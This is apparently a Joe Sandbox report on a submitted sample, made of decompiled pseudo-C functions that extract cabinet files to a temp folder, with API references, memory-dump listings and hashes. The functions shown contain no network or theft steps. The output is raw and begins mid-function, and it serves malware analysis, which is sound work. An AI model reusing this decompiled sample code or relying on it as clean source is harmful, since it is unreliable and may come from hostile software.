                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                    							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0x1391e4;
                                                                                                                                                                                                    						_t30 = E00134702( &_v268, 0x1391e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t41 = E0013476D( &_v268, __eflags);
                                                                                                                                                                                                    						__eflags = _t41;
                                                                                                                                                                                                    						if(_t41 == 0) {
                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0x180);
                                                                                                                                                                                                    						_t30 = E00134980( &_v268, 0x8302); // executed
                                                                                                                                                                                                    						_t75 = _t30;
                                                                                                                                                                                                    						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                    						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = E001347E0( &_v268);
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x1393f4 =  *0x1393f4 + 1;
                                                                                                                                                                                                    						_t33 = _t75;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t44 = _t36 - 1;
                                                                                                                                                                                                    					__eflags = _t44;
                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                    						_t54 = 0x1391e4;
                                                                                                                                                                                                    						_t63 = 0x1391e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t45 =  *_t63;
                                                                                                                                                                                                    							_t63 =  &(_t63[1]);
                                                                                                                                                                                                    							__eflags = _t45;
                                                                                                                                                                                                    						} while (_t45 != 0);
                                                                                                                                                                                                    						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t64 = _t63 - 0x1391e5;
                                                                                                                                                                                                    						__eflags = _t64;
                                                                                                                                                                                                    						_t69 =  &(_t74[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t46 =  *_t74;
                                                                                                                                                                                                    							_t74 =  &(_t74[1]);
                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                    						} while (_t46 != 0);
                                                                                                                                                                                                    						_t73 = _t74 - _t69;
                                                                                                                                                                                                    						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0x1391e4;
                                                                                                                                                                                                    						_t30 = E00134702( &_v268, 0x1391e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                    						_t30 = E00134C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E00134B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                    						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                    						__eflags = _t50;
                                                                                                                                                                                                    						if(_t50 != 0) {
                                                                                                                                                                                                    							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                    							__eflags = _t51;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t51 = 0x80;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t33 = 1;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t30 = _t44 - 1;
                                                                                                                                                                                                    					__eflags = _t30;
                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a4 == 3) {
                                                                                                                                                                                                    					_t30 = E00134B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L3;
                                                                                                                                                                                                    			}































                                                                                                                                                                                                    0x00134cd0
                                                                                                                                                                                                    0x00134cdb
                                                                                                                                                                                                    0x00134ce0
                                                                                                                                                                                                    0x00134ce2
                                                                                                                                                                                                    0x00134cee
                                                                                                                                                                                                    0x00134cf2
                                                                                                                                                                                                    0x00134d0e
                                                                                                                                                                                                    0x00134d0e
                                                                                                                                                                                                    0x00134d11
                                                                                                                                                                                                    0x00134e83
                                                                                                                                                                                                    0x00134e88
                                                                                                                                                                                                    0x00134e98
                                                                                                                                                                                                    0x00134e98
                                                                                                                                                                                                    0x00134d17
                                                                                                                                                                                                    0x00134d17
                                                                                                                                                                                                    0x00134d1a
                                                                                                                                                                                                    0x00134d2f
                                                                                                                                                                                                    0x00134d2f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134d2f
                                                                                                                                                                                                    0x00134d1c
                                                                                                                                                                                                    0x00134d1c
                                                                                                                                                                                                    0x00134d1f
                                                                                                                                                                                                    0x00134dcb
                                                                                                                                                                                                    0x00134dd0
                                                                                                                                                                                                    0x00134dd2
                                                                                                                                                                                                    0x00134ddd
                                                                                                                                                                                                    0x00134ddd
                                                                                                                                                                                                    0x00134de3
                                                                                                                                                                                                    0x00134de8
                                                                                                                                                                                                    0x00134ded
                                                                                                                                                                                                    0x00134ded
                                                                                                                                                                                                    0x00134def
                                                                                                                                                                                                    0x00134df0
                                                                                                                                                                                                    0x00134df0
                                                                                                                                                                                                    0x00134df4
                                                                                                                                                                                                    0x00134df4
                                                                                                                                                                                                    0x00134df6
                                                                                                                                                                                                    0x00134df9
                                                                                                                                                                                                    0x00134dfc
                                                                                                                                                                                                    0x00134dfc
                                                                                                                                                                                                    0x00134dfe
                                                                                                                                                                                                    0x00134dff
                                                                                                                                                                                                    0x00134dff
                                                                                                                                                                                                    0x00134e03
                                                                                                                                                                                                    0x00134e08
                                                                                                                                                                                                    0x00134e0a
                                                                                                                                                                                                    0x00134e0f
                                                                                                                                                                                                    0x00134d03
                                                                                                                                                                                                    0x00134d03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134d03
                                                                                                                                                                                                    0x00134e18
                                                                                                                                                                                                    0x00134e20
                                                                                                                                                                                                    0x00134e25
                                                                                                                                                                                                    0x00134e27
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134e33
                                                                                                                                                                                                    0x00134e38
                                                                                                                                                                                                    0x00134e3a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134e40
                                                                                                                                                                                                    0x00134e51
                                                                                                                                                                                                    0x00134e56
                                                                                                                                                                                                    0x00134e5b
                                                                                                                                                                                                    0x00134e5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134e6a
                                                                                                                                                                                                    0x00134e6f
                                                                                                                                                                                                    0x00134e71
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134e77
                                                                                                                                                                                                    0x00134e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134e7d
                                                                                                                                                                                                    0x00134d25
                                                                                                                                                                                                    0x00134d25
                                                                                                                                                                                                    0x00134d28
                                                                                                                                                                                                    0x00134d36
                                                                                                                                                                                                    0x00134d3b
                                                                                                                                                                                                    0x00134d40
                                                                                                                                                                                                    0x00134d40
                                                                                                                                                                                                    0x00134d42
                                                                                                                                                                                                    0x00134d43
                                                                                                                                                                                                    0x00134d43
                                                                                                                                                                                                    0x00134d47
                                                                                                                                                                                                    0x00134d4a
                                                                                                                                                                                                    0x00134d4a
                                                                                                                                                                                                    0x00134d4c
                                                                                                                                                                                                    0x00134d4f
                                                                                                                                                                                                    0x00134d4f
                                                                                                                                                                                                    0x00134d51
                                                                                                                                                                                                    0x00134d52
                                                                                                                                                                                                    0x00134d52
                                                                                                                                                                                                    0x00134d56
                                                                                                                                                                                                    0x00134d5b
                                                                                                                                                                                                    0x00134d5d
                                                                                                                                                                                                    0x00134d62
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134d67
                                                                                                                                                                                                    0x00134d6f
                                                                                                                                                                                                    0x00134d74
                                                                                                                                                                                                    0x00134d76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134d7c
                                                                                                                                                                                                    0x00134d84
                                                                                                                                                                                                    0x00134d89
                                                                                                                                                                                                    0x00134d8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134d94
                                                                                                                                                                                                    0x00134d99
                                                                                                                                                                                                    0x00134d9e
                                                                                                                                                                                                    0x00134da1
                                                                                                                                                                                                    0x00134daa
                                                                                                                                                                                                    0x00134daa
                                                                                                                                                                                                    0x00134da3
                                                                                                                                                                                                    0x00134da3
                                                                                                                                                                                                    0x00134da3
                                                                                                                                                                                                    0x00134db5
                                                                                                                                                                                                    0x00134dbb
                                                                                                                                                                                                    0x00134dbd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134dc3
                                                                                                                                                                                                    0x00134dc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134dc5
                                                                                                                                                                                                    0x00134dbd
                                                                                                                                                                                                    0x00134d2a
                                                                                                                                                                                                    0x00134d2a
                                                                                                                                                                                                    0x00134d2d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134d2d
                                                                                                                                                                                                    0x00134cf8
                                                                                                                                                                                                    0x00134cfd
                                                                                                                                                                                                    0x00134d02
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00134DB5
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00134DDD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                    • API String ID: 3625706803-3290032183
                                                                                                                                                                                                    • Opcode ID: f7af83895a3595aba1e69ed4ae22249fa3eb4cc2ab76231a81193432a79c7e2c
                                                                                                                                                                                                    • Instruction ID: 73c0b32679cc59d194e510ce0710a67a779bfe81ac151e47062bcb8335277184
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7af83895a3595aba1e69ed4ae22249fa3eb4cc2ab76231a81193432a79c7e2c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C4155362002018BCF259FB8DD446F5B7A5FF65350F044668E886A7A95DF31FE8AC750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00134C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                                                    				struct _FILETIME _v20;
                                                                                                                                                                                                    				FILETIME* _t14;
                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t21 = __ecx * 0x18;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t21 + 0x138d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t14 =  &_v12;
                                                                                                                                                                                                    					_t15 = SetFileTime( *(_t21 + 0x138d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00134c40
                                                                                                                                                                                                    0x00134c4a
                                                                                                                                                                                                    0x00134c8d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134c70
                                                                                                                                                                                                    0x00134c70
                                                                                                                                                                                                    0x00134c7e
                                                                                                                                                                                                    0x00134c86
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134c8a

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32 ref: 00134C54
                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00134C66
                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00134C7E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                    • Opcode ID: 68db87ac228759b8651cbaef6cad4b447bd20e1f4b7841e959a9dde544a183e9
                                                                                                                                                                                                    • Instruction ID: 5aaa20cd6aa0f96dfc049033b9e7d7d6b8a219bf18a97e87b2e92a68f04e1c46
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68db87ac228759b8651cbaef6cad4b447bd20e1f4b7841e959a9dde544a183e9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41F0907260120CAFEB24DFB4CC48DBB7BECEB14260B84052AB855C1050EB30E954D7A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E0013487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				CHAR* _t11;
                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                    				long _t23;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t11 = __ecx;
                                                                                                                                                                                                    				asm("sbb edi, edi");
                                                                                                                                                                                                    				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                    				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                    					asm("sbb esi, esi");
                                                                                                                                                                                                    					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                                                                                    						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t23 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                    				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                    					return _t7;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E0013490C(_t11);
                                                                                                                                                                                                    					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x00134880
                                                                                                                                                                                                    0x0013488c
                                                                                                                                                                                                    0x00134894
                                                                                                                                                                                                    0x001348a0
                                                                                                                                                                                                    0x001348c9
                                                                                                                                                                                                    0x001348ce
                                                                                                                                                                                                    0x001348a2
                                                                                                                                                                                                    0x001348a8
                                                                                                                                                                                                    0x001348b7
                                                                                                                                                                                                    0x001348bc
                                                                                                                                                                                                    0x001348aa
                                                                                                                                                                                                    0x001348ac
                                                                                                                                                                                                    0x001348ac
                                                                                                                                                                                                    0x001348a8
                                                                                                                                                                                                    0x001348de
                                                                                                                                                                                                    0x001348e7
                                                                                                                                                                                                    0x0013490b
                                                                                                                                                                                                    0x001348ee
                                                                                                                                                                                                    0x001348f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134902

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00134A23,?,00134F67,*MEMCAB,00008000,00000180), ref: 001348DE
                                                                                                                                                                                                    • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00134F67,*MEMCAB,00008000,00000180), ref: 00134902
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                    • Opcode ID: 3c224593de0ccbfaafaa7e821d9d2c06bfca126765a69c83de86fafefc173faa
                                                                                                                                                                                                    • Instruction ID: f415741622b3d7e4ef0fb0e8bedab00c70636ffed6459ed1808be81256046354
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c224593de0ccbfaafaa7e821d9d2c06bfca126765a69c83de86fafefc173faa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A20169A3E125702BF32480698C88FB7551CCBDA734F1B0374BDEAE72D2D6646C0482E0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00134AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				int _t12;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				struct HWND__* _t21;
                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 =  *0x13858c; // 0x28c
                                                                                                                                                                                                    				_t9 = E00133680(_t20);
                                                                                                                                                                                                    				if( *0x1391d8 == 0) {
                                                                                                                                                                                                    					_push(_t24);
                                                                                                                                                                                                    					_t12 = WriteFile( *(0x138d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						_t25 = _a12;
                                                                                                                                                                                                    						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    							_t14 =  *0x139400; // 0x9f200
                                                                                                                                                                                                    							_t15 = _t14 + _t25;
                                                                                                                                                                                                    							 *0x139400 = _t15;
                                                                                                                                                                                                    							if( *0x138184 != 0) {
                                                                                                                                                                                                    								_t21 =  *0x138584; // 0x0
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1393f8, 0);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t25;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					return _t9 | 0xffffffff;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00134ad5
                                                                                                                                                                                                    0x00134adb
                                                                                                                                                                                                    0x00134ae7
                                                                                                                                                                                                    0x00134aee
                                                                                                                                                                                                    0x00134b05
                                                                                                                                                                                                    0x00134b0d
                                                                                                                                                                                                    0x00134b14
                                                                                                                                                                                                    0x00134b1a
                                                                                                                                                                                                    0x00134b1c
                                                                                                                                                                                                    0x00134b21
                                                                                                                                                                                                    0x00134b2a
                                                                                                                                                                                                    0x00134b2f
                                                                                                                                                                                                    0x00134b31
                                                                                                                                                                                                    0x00134b39
                                                                                                                                                                                                    0x00134b54
                                                                                                                                                                                                    0x00134b54
                                                                                                                                                                                                    0x00134b39
                                                                                                                                                                                                    0x00134b2f
                                                                                                                                                                                                    0x00134b0f
                                                                                                                                                                                                    0x00134b0f
                                                                                                                                                                                                    0x00134b0f
                                                                                                                                                                                                    0x00134b5e
                                                                                                                                                                                                    0x00134ae9
                                                                                                                                                                                                    0x00134aed
                                                                                                                                                                                                    0x00134aed

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00133680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0013369F
                                                                                                                                                                                                      • Part of subcall function 00133680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001336B2
                                                                                                                                                                                                      • Part of subcall function 00133680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001336DA
                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00134B05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1084409-0
                                                                                                                                                                                                    • Opcode ID: 19b5f0a2806acc7e4a20fe67b68e0fc51cb710e5a2465066dfc9018ce2ff3da7
                                                                                                                                                                                                    • Instruction ID: 28fefc4a7a1f492c5dfd56aee7083adfc9854728422d1a4db3159214179857fb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19b5f0a2806acc7e4a20fe67b68e0fc51cb710e5a2465066dfc9018ce2ff3da7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7001B131200301EBDB148F68DC05BA2BB59FB44725F148265F9399B5F0CBB0E991CB80
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E0013658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                    				char* _t6;
                                                                                                                                                                                                    				char* _t8;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				char* _t16;
                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				char* _t19;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t16 = __ecx;
                                                                                                                                                                                                    				_t10 = __edx;
                                                                                                                                                                                                    				_t17 = __ecx;
                                                                                                                                                                                                    				_t1 = _t17 + 1; // 0x138b3f
                                                                                                                                                                                                    				_t12 = _t1;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t4 =  *_t17;
                                                                                                                                                                                                    					_t17 = _t17 + 1;
                                                                                                                                                                                                    				} while (_t4 != 0);
                                                                                                                                                                                                    				_t18 = _t17 - _t12;
                                                                                                                                                                                                    				_t2 = _t18 + 1; // 0x138b40
                                                                                                                                                                                                    				if(_t2 < __edx) {
                                                                                                                                                                                                    					_t19 = _t18 + __ecx;
                                                                                                                                                                                                    					if(_t19 > __ecx) {
                                                                                                                                                                                                    						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                    						if( *_t8 != 0x5c) {
                                                                                                                                                                                                    							 *_t19 = 0x5c;
                                                                                                                                                                                                    							_t19 =  &(_t19[1]);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t6 = _a4;
                                                                                                                                                                                                    					 *_t19 = 0;
                                                                                                                                                                                                    					while( *_t6 == 0x20) {
                                                                                                                                                                                                    						_t6 = _t6 + 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return E001316B3(_t16, _t10, _t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0x8007007a;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x00136592
                                                                                                                                                                                                    0x00136594
                                                                                                                                                                                                    0x00136596
                                                                                                                                                                                                    0x00136598
                                                                                                                                                                                                    0x00136598
                                                                                                                                                                                                    0x0013659b
                                                                                                                                                                                                    0x0013659b
                                                                                                                                                                                                    0x0013659d
                                                                                                                                                                                                    0x0013659e
                                                                                                                                                                                                    0x001365a2
                                                                                                                                                                                                    0x001365a4
                                                                                                                                                                                                    0x001365a9
                                                                                                                                                                                                    0x001365b2
                                                                                                                                                                                                    0x001365b6
                                                                                                                                                                                                    0x001365ba
                                                                                                                                                                                                    0x001365c3
                                                                                                                                                                                                    0x001365c5
                                                                                                                                                                                                    0x001365c8
                                                                                                                                                                                                    0x001365c8
                                                                                                                                                                                                    0x001365c3
                                                                                                                                                                                                    0x001365c9
                                                                                                                                                                                                    0x001365cc
                                                                                                                                                                                                    0x001365d2
                                                                                                                                                                                                    0x001365d1
                                                                                                                                                                                                    0x001365d1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001365dc
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(00138B3E,00138B3F,00000001,00138B3E,-00000003,?,001360EC,00131140,?), ref: 001365BA
                                                                                                                                                                                                    Memory Dump Source
